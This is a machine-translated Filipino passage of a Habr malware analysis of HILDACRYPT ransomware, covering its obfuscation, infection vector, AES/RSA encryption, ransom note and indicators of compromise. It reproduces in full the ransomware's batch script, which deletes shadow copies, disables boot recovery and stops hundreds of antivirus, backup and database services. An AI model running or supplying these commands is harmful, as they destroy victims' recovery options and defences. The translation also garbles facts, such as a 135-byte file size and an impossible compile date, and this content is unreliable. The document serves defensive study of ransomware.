Hello, Habr! Muli, pinag-uusapan natin ang mga pinakabagong bersyon ng malware mula sa kategoryang Ransomware. Ang HILDACRYPT ay isang bagong ransomware, isang miyembro ng pamilyang Hilda na natuklasan noong Agosto 2019, na ipinangalan sa Netflix cartoon na ginamit upang ipamahagi ang software. Ngayon ay nakikilala natin ang mga teknikal na tampok ng na-update na ransomware virus na ito.
Sa unang bersyon ng Hilda ransomware, isang link sa isa na nai-post sa Youtube
Static na pagsusuri
Ang ransomware ay nakapaloob sa isang PE32 .NET file na isinulat para sa MS Windows. Ang laki nito ay 135 bytes. Parehong ang pangunahing program code at ang defender program code ay nakasulat sa C#. Ayon sa compilation date at time stamp, ang binary ay ginawa noong Setyembre 168, 14.
Ayon sa Detect It Easy, ang ransomware ay naka-archive gamit ang Confuser at ConfuserEx, ngunit ang mga obfuscator na ito ay katulad ng dati, ang ConfuserEx lang ang kahalili ng Confuser, kaya ang kanilang mga code signature ay magkatulad.
Ang HILDACRYPT ay talagang nakabalot sa ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vektor ng pag-atake
Malamang, ang ransomware ay natuklasan sa isa sa mga web programming site, na nagpapanggap bilang isang lehitimong XAMPP program.
Ang buong kadena ng impeksyon ay makikita sa
Obfuscation
Ang mga string ng ransomware ay naka-imbak sa naka-encrypt na anyo. Kapag inilunsad, idini-decrypt ng HILDACRYPT ang mga ito gamit ang Base64 at AES-256-CBC.
Instalasyon
Una sa lahat, ang ransomware ay gumagawa ng isang folder sa %AppDataRoaming% kung saan ang GUID (Globally Unique Identifier) parameter ay random na nabuo. Sa pamamagitan ng pagdaragdag ng bat file sa lokasyong ito, inilulunsad ito ng ransomware virus gamit ang cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat at lumabas
Pagkatapos ay magsisimula itong magsagawa ng isang batch script upang hindi paganahin ang mga feature o serbisyo ng system.
Ang script ay naglalaman ng mahabang listahan ng mga utos na sumisira sa mga kopya ng anino, hindi paganahin ang SQL server, backup at mga solusyon sa antivirus.
Halimbawa, hindi matagumpay na sinusubukan nitong ihinto ang mga serbisyo ng Acronis Backup. Bilang karagdagan, inaatake nito ang mga backup na system at mga solusyon sa antivirus mula sa mga sumusunod na vendor: Veeam, Sophos, Kaspersky, McAfee at iba pa.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Kapag ang mga serbisyo at prosesong binanggit sa itaas ay hindi pinagana, ang cryptolocker ay nangongolekta ng impormasyon tungkol sa lahat ng tumatakbong proseso gamit ang tasklist command upang matiyak na ang lahat ng kinakailangang serbisyo ay hindi gumagana.
tasklist v/fo csv
Ang utos na ito ay nagpapakita ng isang detalyadong listahan ng mga tumatakbong proseso, ang mga elemento nito ay pinaghihiwalay ng "," sign.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Pagkatapos ng pagsusuring ito, sisimulan ng ransomware ang proseso ng pag-encrypt.
Pag-encrypt
Pag-encrypt ng file
Ang HILDACRYPT ay dumaan sa lahat ng nahanap na nilalaman ng mga hard drive, maliban sa mga folder ng Recycle.Bin at Reference AssembliesMicrosoft. Ang huli ay naglalaman ng mga kritikal na dll, pdb, atbp. na mga file para sa mga .Net na application na maaaring makaapekto sa pagpapatakbo ng ransomware. Upang maghanap ng mga file na ie-encrypt, ang sumusunod na listahan ng mga extension ay ginagamit:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ang ransomware ay gumagamit ng AES-256-CBC algorithm upang i-encrypt ang mga file ng user. Ang laki ng key ay 256 bits at ang laki ng initialization vector (IV) ay 16 bytes.
Sa sumusunod na screenshot, ang mga halaga ng byte_2 at byte_1 ay random na nakuha gamit ang GetBytes().
Key
ВИ
Ang naka-encrypt na file ay may extension na HCY!.. Ito ay isang halimbawa ng isang naka-encrypt na file. Ang susi at IV na binanggit sa itaas ay nilikha para sa file na ito.
Key encryption
Iniimbak ng cryptolocker ang nabuong AES key sa isang naka-encrypt na file. Ang unang bahagi ng naka-encrypt na file ay may header na naglalaman ng data gaya ng HILDACRYPT, KEY, IV, FileLen sa XML na format, at ganito ang hitsura:
Ginagawa ang AES at IV key encryption gamit ang RSA-2048, at ginagawa ang pag-encode gamit ang Base64. Ang RSA public key ay naka-imbak sa katawan ng cryptolocker sa isa sa mga naka-encrypt na string sa XML na format.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Ang isang RSA public key ay ginagamit upang i-encrypt ang AES file key. Ang RSA public key ay Base64 na naka-encode at binubuo ng isang modulus at isang pampublikong exponent na 65537. Ang pag-decryption ay nangangailangan ng RSA private key, na mayroon ang umaatake.
Pagkatapos ng RSA encryption, ang AES key ay naka-encode gamit ang Base64 na nakaimbak sa naka-encrypt na file.
Mensahe ng pantubos
Kapag kumpleto na ang pag-encrypt, isinusulat ng HILDACRYPT ang html file sa folder kung saan na-encrypt nito ang mga file. Ang abiso ng ransomware ay naglalaman ng dalawang email address kung saan maaaring makipag-ugnayan ang biktima sa umaatake.
Ang abiso ng pangingikil ay naglalaman din ng linyang "No loli is safe;)" - isang reference sa anime at manga character na may hitsura ng maliliit na batang babae na pinagbawalan sa Japan.
Pagbubuhos
Ang HILDACRYPT, isang bagong pamilya ng ransomware, ay naglabas ng bagong bersyon. Pinipigilan ng modelo ng pag-encrypt ang biktima na i-decrypt ang mga file na naka-encrypt ng ransomware. Gumagamit ang Cryptolocker ng mga aktibong paraan ng proteksyon upang hindi paganahin ang mga serbisyo ng proteksyon na nauugnay sa mga backup na system at mga solusyon sa antivirus. Ang may-akda ng HILDACRYPT ay isang tagahanga ng animated na seryeng Hilda na ipinakita sa Netflix, ang link sa trailer na kung saan ay nakapaloob sa buyout letter para sa nakaraang bersyon ng programa.
Gaya ng dati,
Mga tagapagpahiwatig ng kompromiso
Extension ng file HCY!
HILDACRYPTReadMe.html
xamp.exe na may isang letrang "p" at walang digital signature
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Pinagmulan: www.habr.com